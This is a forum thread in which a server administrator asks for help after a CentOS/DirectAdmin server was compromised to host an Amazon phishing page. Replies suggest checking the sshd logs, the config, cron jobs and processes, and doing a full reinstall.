Hacked for Amazon phishing site. Need help

[decafranky]

Hi,

A Centos 4.4 server running directadmin is hacked for running a phising site for amazon.

Phising url is uploaded to /var/www/html/.gp/css/homepage.html/ref=topnav_ya_gw/102-9587475-5260134/exec.php?cmd=validate

Is created as user root:root (!!!).

Even remote ssh login is not possible anymore (local login into server is not a problem). When remote ssh login, after asking password i get timeouts.

With webmin, i can see the html files and delete it. But after copple of hours the are back uploaded.

Need help.

And how can i fix the remote ssh login?

Franky

EDIT:
I run following services:
Apache 1.3.34
DirectAdmin 1.27.5
Exim 4.63
MySQL 4.1.11
Named 9.2.4
ProFTPd 1.2.10
sshd Running
vm-Pop3d 1.1.7f-DA-2

 

[chatwizrd]

Use webmin command prompt to look for sshd errors.

grep sshd /var/log/messages

Once you know why it is erroring out you can work on correcting it.

 

[kke]

Login DA CP as Admin
Use Log Viewer to see error message
Use File Editor to check sshd_conf file may be login timeout is changed.
edit/save the file then restart sshd

try ssh to your server check for all suspicious cron and running process.

Sound like you have webmin installed then you may also apply command line via webmin.

 

[nobaloney]

Anyone who is able to create files as foot and disable ssh now owns your server.

It's been hacked and the only safe thing to do is a bare metal reinstall.

Jeff